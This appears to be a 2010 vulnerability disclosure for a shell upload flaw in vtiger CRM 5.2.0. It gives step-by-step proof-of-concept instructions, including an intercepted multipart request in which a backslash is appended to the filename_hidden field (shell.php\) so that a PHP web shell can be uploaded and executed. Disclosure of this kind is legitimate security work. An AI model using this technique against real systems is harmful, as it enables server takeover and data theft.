#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Shell Upload                                                                      #
# Software.................vtiger CRM 5.2.0                                                                  #
# Download.................http://sourceforge.net/projects/vtigercrm/files/                                  #
# Date.....................5/21/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# A shell upload vunlerability in vtiger CRM 5.2.0 can be exploited to execute arbitrary PHP.                #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# Upload a PHP file and append a backslash to the filename_hidden value.                                     #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
# 1) Login and navigate to http://localhost/index.php?action=upload&module=uploads                           #
#                                                                                                            #
# 2) Capture the packet using a debugging proxy, append a backslash to the filename_hidden value, and submit #
#    it. e.g.                                                                                                #
#                                                                                                            #
#     ------WebKitFormBoundaryihWhA69lH4hKrGBy                                                               #
#     Content-Disposition: form-data; name="filename_hidden"                                                 #
#                                                                                                            #
#     shell.php\                                                                                             #
#                                                                                                            #
# 3) Navigate to the uploaded file http://localhost/storage/{Year}/{Month}/{Week}/{file} e.g.                #
#    http://localhost/storage/2010/May/week3/shell.php                                                       #
#                                                                                                            #
#============================================================================================================#